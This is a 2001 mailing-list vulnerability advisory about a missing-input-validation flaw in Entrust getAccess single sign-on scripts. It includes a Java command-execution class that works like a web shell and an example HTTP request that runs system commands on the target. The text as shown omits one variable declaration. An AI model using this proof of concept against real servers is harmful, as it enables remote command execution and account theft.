From - Mon Jul 30 11:33:50 2001 Return-Path: Delivered-To: madchat.org-triton@madchat.org Received: (qmail 11251 invoked by uid 503); 30 Jul 2001 13:29:19 -0000 Received: from unknown (HELO vikki.vulnwatch.org) (199.233.98.101) by ns1.digital-internetwork.net with SMTP; 30 Jul 2001 13:29:19 -0000 Received: (qmail 12163 invoked by alias); 30 Jul 2001 14:29:08 -0000 Mailing-List: contact vulnwatch-help@vulnwatch.org; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list vulnwatch@vulnwatch.org Delivered-To: moderator for vulnwatch@vulnwatch.org Received: (qmail 17229 invoked from network); 30 Jul 2001 07:44:01 -0000 X-Originating-IP: [193.154.142.195] From: "rudi carell" To: vulnwatch@vulnwatch.org Bcc: Date: Mon, 30 Jul 2001 07:41:37 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 30 Jul 2001 07:41:37.0299 (UTC) FILETIME=[103DAE30:01C118CB] Subject: [VulnWatch] getAccess - Entrust hola listmembers, getAccess[tm] is used as a single-sign-on system often used for large internet-portals. --- snip (http://www.entrust.com) --- Entrust GetAccess[tm] offers the most comprehensive solution for consistently deploying and enforcing basic and enhanced security across online applications, from Web browsers, to enterprise applications and legacy database systems. --- snip --- problem description: due to missing input-validation it is possible to run(start) java-programs on the "getaccess"-machine. combined with public accessibly uploads or any other possibility to create class-files on the server this vulnerability c ould be used to run arbitrary system commands on the target machine( or change getAccess parameters and steal any user ac count you want BTW). it should also be possible(but not proven yet) to exploit default-,install- or demo classes within Java or getAccess whic h would make the file-upload(creation) part unneeded! (uninstall.class is very likely an effective DOS) Example: find exploitable getAccess-class(one which accepts params!) or upload a "command" programm: --- cut here (example cmd.java) --- import java.io.*; public class cmd { public static void main(String args[]) { s = null; try { Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]); BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream())); BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream())); System.out.println("Content-type: text/html\n\n"); while ((s = stdInput.readLine()) != null) { System.out.println(s); } while ((s = stdError.readLine()) != null) { System.out.println(s); } System.exit(0); } catch (IOException e) { e.printStackTrace(); System.exit(-1); } } } --- cut here --- later then .. a http-request to : http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi .. will run "/whereever/cmd.class" and execute "/bin/ls -alsi" Summary: object: *.gas.bat (all the getAccess cgi-shell-scripts) class: input validation remote: yes vendor: has been informed with a separate e-mail ( entrust@entrust.com - with no response until NOW) (and BTW. i would NEVER EVER recommand to use shell-scripts for authentication purposes!) nice day, rC rudicarell@hotmail.com security@freefly.com http://www.freefly.com/security/ _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp